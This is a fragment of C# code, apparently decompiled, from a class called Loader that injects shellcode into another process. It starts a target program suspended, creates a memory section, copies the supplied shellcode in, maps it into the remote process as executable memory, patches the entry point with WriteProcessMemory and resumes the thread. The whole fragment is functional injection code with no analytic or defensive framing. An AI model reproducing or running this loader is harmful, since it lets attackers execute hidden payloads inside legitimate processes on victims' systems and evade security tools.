public Loader.PROCESS_INFORMATION StartProcess(string path) { Loader.STARTUPINFO sTARTUPINFO = default(Loader.STARTUPINFO); Loader.PROCESS_INFORMATION result = default(Loader.PROCESS_INFORMATION); uint dwCreateFlags = 4u; if (!Loader.CreateProcess((IntPtr)0, path, (IntPtr)0, (IntPtr)0, false, dwCreateFlags, (IntPtr)0, (IntPtr)0, ref sTARTUPINFO, out result)) { throw new SystemException("[x] Failed to create process!"); } return(result); }
public void Load(string targetProcess, byte[] shellcode) { Loader.PROCESS_INFORMATION pROCESS_INFORMATION = this.StartProcess(targetProcess); this.FindEntry(pROCESS_INFORMATION.hProcess); if (!this.CreateSection((uint)shellcode.Length)) { throw new SystemException("[x] Failed to create new section!"); } this.SetLocalSection((uint)shellcode.Length); this.CopyShellcode(shellcode); this.MapAndStart(pROCESS_INFORMATION); Loader.CloseHandle(pROCESS_INFORMATION.hThread); Loader.CloseHandle(pROCESS_INFORMATION.hProcess); }
public void MapAndStart(Loader.PROCESS_INFORMATION pInfo) { KeyValuePair <IntPtr, IntPtr> keyValuePair = this.MapSection(pInfo.hProcess, 64u, IntPtr.Zero); if (keyValuePair.Key == (IntPtr)0 || keyValuePair.Value == (IntPtr)0) { throw new SystemException("[x] Failed to map section into target process!"); } this.remotemap_ = keyValuePair.Key; this.remotesize_ = keyValuePair.Value; KeyValuePair <int, IntPtr> keyValuePair2 = this.BuildEntryPatch(keyValuePair.Key); try { IntPtr nSize = (IntPtr)keyValuePair2.Key; IntPtr value = 0; if (!Loader.WriteProcessMemory(pInfo.hProcess, this.pEntry_, keyValuePair2.Value, nSize, out value) || value == IntPtr.Zero) { throw new SystemException("[x] Failed to write patch to start location! " + Loader.GetLastError().ToString()); } } finally { if (keyValuePair2.Value != IntPtr.Zero) { Marshal.FreeHGlobal(keyValuePair2.Value); } } byte[] lpBuffer = new byte[4096]; IntPtr intPtr = 0; if (!Loader.ReadProcessMemory(pInfo.hProcess, this.pEntry_, lpBuffer, 1024, out intPtr)) { throw new SystemException("Failed!"); } if (Loader.ResumeThread(pInfo.hThread) == 4294967295u) { throw new SystemException("[x] Failed to restart thread!"); } }
private static extern bool CreateProcess(IntPtr lpApplicationName, string lpCommandLine, IntPtr lpProcAttribs, IntPtr lpThreadAttribs, bool bInheritHandles, uint dwCreateFlags, IntPtr lpEnvironment, IntPtr lpCurrentDir, [In] ref Loader.STARTUPINFO lpStartinfo, out Loader.PROCESS_INFORMATION lpProcInformation);